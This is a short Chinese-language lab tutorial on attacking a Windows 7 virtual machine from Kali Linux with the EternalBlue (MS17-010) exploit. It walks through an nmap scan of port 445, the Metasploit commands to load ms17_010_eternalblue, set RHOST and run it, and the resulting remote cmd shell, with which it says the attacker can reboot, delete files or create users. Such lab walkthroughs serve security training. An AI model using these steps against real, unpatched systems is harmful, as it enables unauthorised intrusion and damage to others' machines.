兩臺Vmware虛擬機:
Kali
Win7 64位:
(主機)kali的ip是 192.168.0.119
(靶機)win7的ip是192.168.0.109
使用nmap端口掃描工具,掃描一下目標靶機;如下圖,可以發現:目標win7系統的445端口開啓,可以使用永恆之藍漏洞攻擊
Kali終端輸入msfconsole,啓動msfconsole;如下圖,啓動畫面每次都不一樣 圖像不一樣不用擔心
先查找一下永恆之藍的攻擊模塊: 使用命令 search eternalblue
使用該攻擊模塊:
命令:use exploit/windows/smb/ms17_010_eternalblue ,
使用這個模塊,我們show targets看一下這個模塊適用於哪些系統的主機
查看一下攻擊配置show options
可以看到,win7和server 2008 r2都適用
設置要攻擊的靶機IP地址:set RHOST 192.168.0.109
接着run執行攻擊
程序就會運行,當看到WIN的時候,說明我們已經滲透進win7裏面去了,按下回車出現了win7的cmd,這是已經是滲透成功了。但有時候不一定會成功,會返回FAIL,說明這個系統打了補丁,這個漏洞已經沒有威力了。
攻擊成功!!! 成功進入到靶機的cmd管理界面
但是,此時界面爲亂碼,我們解決一下編碼的問題:在靶機的命令行界面:執行命令 chcp 65001 切換編碼字符,然後執行命令 顯示正常。
此時,我們已經滲透進靶機的cmd操作界面,可以對靶機爲所欲爲(重啓 刪文件 創建文件 執行exe 創建用戶等等)了。